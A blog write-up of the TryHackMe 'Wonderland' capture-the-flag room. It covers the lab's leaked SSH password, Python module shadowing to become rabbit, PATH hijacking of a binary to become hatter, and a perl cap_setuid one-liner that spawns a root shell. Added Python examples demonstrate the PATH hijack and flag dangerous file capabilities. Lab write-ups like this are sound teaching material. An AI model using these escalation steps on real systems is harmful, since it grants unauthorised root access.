TryHackMe: Wonderland

Samantha
6 min read, Mar 16, 2021

Fall down the rabbit hole and enter wonderland.

Link to room HERE.

Here is the initial nmap scan:

Looks like there is a webpage and an SSH server. Here is a look at the webpage:

After that I did a directory search with gobuster:

At the /r directory we get a message to “keep going”, so I ran another search:

Ok, so from here we have /r/a

I’m going to make the assumption that there is going to be something at /r/a/b/b/i/t/.

Also, remember there was a poem directory too:

And also /img

Back at the nmap results, I see that they are using Golang, so I started looking up possible vulnerabilities:

I did find a couple, including a potential DoS attack, but nothing that could really help me here.

A funny side note though, while I was searching around in Metasploit I got the rabbit graphic:

I went back to the things I already had.

Eventually, by looking at the source code on the /r/a/b/b/i/t page, I discovered there was an important reason for following the rabbit. It led us to what looks like Alice’s credentials:

Username: alice

Password: HowDoTheLittleCrocodileImproveHisShiningTail

I assume this can be used to log in to SSH:

We’re in!

There is an interesting program down near the bottom of the listing. Also, weirdly, root.txt is located here in Alice's home directory instead of in its usual place. We don't have permission to read it.

But I guess since it is Wonderland, “Everything is upside down here”. Maybe the user.txt is in the root directory.

From here we need to escalate our privileges to see the contents of root.txt.

After checking Alice’s permissions, I see that she can do some things with that walrus program as the user rabbit.

walrus_and_the_carpenter.py is a script that contains a very long poem. We do not have permission to edit it.

At the top, notice that it imports the random module.

The script itself does very little: it prints 10 randomly chosen lines from the poem.

But that one import is all we need, thanks to something called Python library hijacking (module shadowing). When Python runs a script, the first entry in its module search path (sys.path[0]) is the directory that holds the script, and it is searched before the standard library. The walrus script lives in Alice's home directory, so if we create a file called random.py there, the walrus program imports our file instead of the real random module.

It doesn't need to be complicated at all: anything that spawns a shell will do, and since we run the script as rabbit, the shell will be rabbit's.

Create the file in Alice’s home directory. You can edit it with nano or something similar.

Remember to save it!

Great, our random.py file is in the right place:

Now let’s run the walrus program again (as rabbit this time) and see what happens:

Excellent. If we switch over to rabbit’s home directory there is a binary called teaParty.

If you run that, it will give you instructions about waiting for the Mad Hatter to arrive.

I can't seem to use the strings command here to check out the contents of the file, but I did use the cat command and picked through it a bit (luckily it was a small file).

I did find this:

So what appears to be happening is that the program calls date to work out when the Hatter will show up.

But it calls date by its bare name rather than by an absolute path such as /bin/date, so the shell resolves it by walking the directories in PATH in order. That can be exploited by exporting our own PATH with a directory we control at the front, so that teaParty finds our date before the real one.

The next step is to create a fake date file in the /tmp directory: a small script that spawns a shell. The next time teaParty runs it will find and execute this instead of the real date, and because teaParty executes with hatter's privileges, the shell it hands us runs as hatter too.

Again, remember to save!

From here, make the new file executable (chmod +x); the PATH lookup only picks up executable files, so without this the real date would still run:

Now run teaParty again and see what happens…

It looks like we are now hatter.
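The same lookup, as an added example that is not the room's teaParty binary or the author's script: it plants a harmless fake date in a temporary directory (standing in for /tmp), prepends that directory to PATH the way `export PATH=/tmp:$PATH` does, and then runs a bare `date` and an absolute `/bin/date` the way a binary calling system() would. The fake date's marker text and the `/bin/date` path are assumptions for the demo; on the box the fake's body would be `exec /bin/bash`.

```python
"""PATH hijacking, as used against teaParty's unqualified call to date.

A program that runs a command by bare name (system("date ...") or the like)
lets the caller's PATH decide which file actually executes; prepending a
directory we control makes our date the first match. Because teaParty runs
with hatter's privileges, on the box the fake date's shell is hatter's.
"""
import os
import shlex
import shutil
import subprocess
import tempfile

# Fake date: echoes a marker instead of a shell so the effect is visible in a
# non-interactive run. Payload on the box: exec /bin/bash
FAKE_DATE = '#!/bin/sh\n# payload on the box: exec /bin/bash\necho "FAKE DATE RAN AS $(id -un)"\n'


def plant_fake_date(directory: str) -> str:
    """Write the fake date and make it executable (chmod +x); a non-executable
    file is skipped by the PATH search and the real date would run instead."""
    path = os.path.join(directory, "date")
    with open(path, "w") as f:
        f.write(FAKE_DATE)
    os.chmod(path, 0o755)
    return path


def hijacked_env(directory: str) -> dict:
    """Same effect as: export PATH=<directory>:$PATH"""
    env = dict(os.environ)
    env["PATH"] = directory + os.pathsep + env.get("PATH", "/usr/bin:/bin")
    return env


def uses_bare_command(command_line: str) -> bool:
    """Static check for the weakness: True when the command word has no '/',
    so it is resolved through PATH (e.g. "date -R"); False for "/bin/date -R"."""
    words = shlex.split(command_line)
    return bool(words) and "/" not in words[0]


def run_like_tea_party(command_line: str, env: dict) -> str:
    """Mimic a binary that hands a command line to system(), i.e. /bin/sh -c."""
    proc = subprocess.run(command_line, shell=True, env=env,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def demo() -> dict:
    """Plant the fake, hijack PATH, and show which date each call style gets."""
    with tempfile.TemporaryDirectory() as hijack_dir:
        fake = plant_fake_date(hijack_dir)
        env = hijacked_env(hijack_dir)
        return {
            "fake_path": fake,
            "resolved": shutil.which("date", path=env["PATH"]),  # what sh will find
            "bare": run_like_tea_party("date", env),              # hijacked
            "absolute": run_like_tea_party("/bin/date +%Y", env),  # immune
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The absolute call is the fix from the defender's side: a privileged binary that must shell out should use full paths (or reset PATH itself) rather than trust whatever environment its caller supplies. uses_bare_command() is the one-line check to run over any command strings you pull out of such a binary with strings or cat.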

If you make your way to hatter’s home directory, you can see there is a file called password.txt:

Let’s try connecting via SSH as our new user, so we can get the full hatter experience.

After messing around a bit and not finding much, I used linPEAS to automate my search. If you’re not familiar with how to use linPEAS, the documentation can be found HERE (raw script HERE).

I also have a blog post that goes over it HERE. Basically, after you save the raw script on your attacking machine, you serve it with a simple HTTP server, fetch it from the target as hatter, and then execute it there.

Under the capabilities section of the report, we can see that perl has the cap_setuid capability (getcap shows it as cap_setuid+ep). File capabilities let a binary perform specific privileged operations without being setuid root, and cap_setuid lets the process change its own UID to any value. This means that hatter can set their UID to 0, which is root.

You can leverage this using the following command to spawn a shell as root (use straight quotes; curly ones break the command):

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
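Rather than eyeballing the linPEAS capabilities section, here is an added example (not linPEAS code and not the author's) that parses `getcap -r` output in both formats libcap has printed over the years and flags the capabilities that give a local user a direct route to root, which is how the perl finding above stands out. The sample getcap lines are constructed for the example (only the perl line reflects the page), and the list of dangerous capabilities is a triage heuristic rather than a complete one.

```python
"""Triage of Linux file capabilities, as surfaced by linPEAS on the hatter account.

File capabilities let a binary do specific privileged things without being
setuid root. perl carrying cap_setuid+ep ('e' effective, 'p' permitted) can
call setuid(0) from any user who can run it, which is the root shell above.
"""
import re
from typing import Dict, List

# Why each capability matters when a low-privileged user can run the binary.
# Assumption: a triage list, not an exhaustive one.
PRIVESC_CAPS = {
    "cap_setuid": "process may change its UID, e.g. setuid(0) then exec a shell",
    "cap_setgid": "process may change its GID / supplementary groups",
    "cap_dac_override": "bypasses file permission checks (write /etc/passwd, /etc/shadow)",
    "cap_dac_read_search": "bypasses read and directory-search permission checks",
    "cap_chown": "may change ownership of any file",
    "cap_fowner": "bypasses owner checks, e.g. chmod on root-owned files",
    "cap_setfcap": "may grant file capabilities to other binaries",
    "cap_sys_admin": "broad admin operations such as mount",
    "cap_sys_ptrace": "may attach to and inject into processes of other users",
    "cap_sys_module": "may load kernel modules",
    "cap_sys_rawio": "raw access to disks and /dev/mem",
}

# One clause of cap_to_text(3) output: comma-separated names, operator, flag letters.
CLAUSE = re.compile(r"([a-z0-9_,]+)([+=-])([eip]*)")

# Constructed sample in the two formats getcap has used ('path = caps' for
# older libcap, 'path caps' for newer). Only the perl line reflects the page.
SAMPLE_GETCAP = """\
/usr/bin/perl = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3 = cap_setuid+p
/usr/sbin/arping cap_net_raw=ep
/usr/bin/gdb = cap_sys_ptrace+ep
"""


def parse_getcap(output: str) -> Dict[str, Dict[str, str]]:
    """Map each path to {capability: flag letters}."""
    caps_by_path: Dict[str, Dict[str, str]] = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")      # paths containing spaces not handled
        caps: Dict[str, str] = {}
        for names, op, flags in CLAUSE.findall(rest.lstrip("= ")):
            if op == "-":                         # a removal clause grants nothing
                continue
            for name in names.split(","):
                caps[name] = flags
        caps_by_path[path] = caps
    return caps_by_path


def triage(caps_by_path: Dict[str, Dict[str, str]]) -> List[dict]:
    """Findings for dangerous capabilities. 'effective' is True when the
    capability is already in the effective set (+e), so the program can use it
    without raising it itself; '+p' alone still deserves a look."""
    findings = []
    for path in sorted(caps_by_path):
        for cap, flags in caps_by_path[path].items():
            if cap in PRIVESC_CAPS:
                findings.append({"path": path, "cap": cap, "flags": flags,
                                 "effective": "e" in flags, "why": PRIVESC_CAPS[cap]})
    return findings


if __name__ == "__main__":
    for f in triage(parse_getcap(SAMPLE_GETCAP)):
        state = "usable now" if f["effective"] else "permitted only"
        print(f"{f['path']}: {f['cap']}+{f['flags']} [{state}] {f['why']}")
```

Run it against real output with something like getcap -r / 2>/dev/null piped into parse_getcap(); the perl line is the one that maps straight onto the POSIX::setuid(0) one-liner above, while a '+p'-only entry means the program has to raise the capability itself before it can be used.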

Happy Hacking! ❤
